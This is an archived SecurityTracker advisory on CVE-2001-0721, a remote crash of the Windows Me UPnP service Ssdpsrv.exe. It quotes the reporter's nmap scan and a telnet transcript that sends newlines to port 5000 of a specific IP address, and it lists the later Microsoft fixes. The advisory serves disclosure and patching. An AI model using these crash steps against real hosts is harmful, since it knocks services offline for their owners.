SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Windows UPnP (Ssdpsrv, others) Vendors:   Microsoft
Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users
SecurityTracker Alert ID:  1002601
SecurityTracker URL:  http://securitytracker.com/id/1002601
CVE Reference:   CVE-2001-0721   (Links to External Site)
Updated:  Nov 2 2001
Original Entry Date:  Oct 20 2001
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in Ssdpsrv, a component of the Microsoft Windows Me Universal Plug and Play (UPnP) implementation. A remote user may be able to cause the Ssdpsrv service to crash.

It is reported that a remote user can connect to the Ssdpsrv port and cause the service to crash. The service must be manually restarted or the server must be rebooted in order for the service to return to normal operation.

The following steps can reportedly be used to cause the service to crash:

Connect to the computer on port 5000.
Send 3 to 5 newline characters.
You then get an error and are disconnected.

A demonstration exploit transcript is provided:

<snip>
bash-2.05$ telnet 165.121.234.217 5000
Trying 165.121.234.217...
Connected to 165.121.234.217.
Escape character is '^]'.



HTTP/1.1 400 Bad Request

Connection closed by foreign host.
bash-2.05$
</snap>

The error caused by the crash is provided:

Ssdpsrv has caused an error in MSVCRT.DLL.
Ssdpsrv will now close.
If you continue to experience problems,
try restarting your computer.

Several users have reported that they are unable to reproduce the error.

Impact:   A remote user can cause the Ssdpsrv.exe service to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-054.asp (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (Me), Windows (98), Windows (XP)
Underlying OS Comments:  Windows 98 and 98SE are only affected if the Internet Connection Sharing that ships with Windows XP has been installed on the host

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Microsoft Issues Fix) Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users
The vendor has released a fix.
(A User Provides Details) Re: Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users
A user has provided details on the vulnerabilities.
(Microsoft Describes Problem with Windows ME Patch) Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users
Microsoft describes the problem with the Windows ME version of the patch. A new patch for that OS version will be issued shortly.
(Microsoft Issues Corrected Update for Windows ME) Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users
The vendor has released a corrected update for Windows ME.
(Microsoft Issues New Fix) Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users
The vendor has released a revised fix that supercedes MS01-054.



 Source Message Contents

Subject:  Ssdpsrv.exe in WindowsME


By connecting to a computer running Ssdpsrv you are able to crash the 
Ssdpsrv server.

Ssdpsrv.exe is the file that starts the UPnP server on WindowsME boxes.
This service comes standard with the WindowsME installation.

The Ssdpsrv.exe server is started at boot.
Here is the registry entry:
  KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersoin\RunServices
Here is the file that starts the server:
  c:\windows\system\ssdpsrv.exe

For information about UPnP go here:
  http://support.microsoft.com/support/kb/articles/Q262/4/58.ASP

Upon running a scan on a computer running the server I get the following:
<snip>
  bash-2.05$ nmap -sT 165.121.234.217
  Starting nmap V. 2.54BETA29 ( www.insecure.org/nmap/ )
  Interesting ports on user-2injqmp.dialup.mindspring.com (165.121.234.217):
  (The 1547 ports scanned but not shown below are in state: closed)
  Port       State       Service
  139/tcp    open        netbios-ssn
  5000/tcp   open        fics
  Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds
</snap>

Method to crash Ssdpsrv:
  Connect to the computer on port 5000.
  Send 3 to 5 newline characters.
  You then get an error and are disconnected.
<snip>
  bash-2.05$ telnet 165.121.234.217 5000
  Trying 165.121.234.217...
  Connected to 165.121.234.217.
  Escape character is '^]'.



  HTTP/1.1 400 Bad Request

  Connection closed by foreign host.
  bash-2.05$
</snap>

Here is the error caused by the crash:
  Ssdpsrv has caused an error in MSVCRT.DLL.
  Ssdpsrv will now close.
  If you continue to experience problems,
  try restarting your computer.

This causes the server crash and closes port 5000.
Either you must restart the server by manually running ssdpsrv.exe
or reboot.

shouts to pulltheplug #c.
:o

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC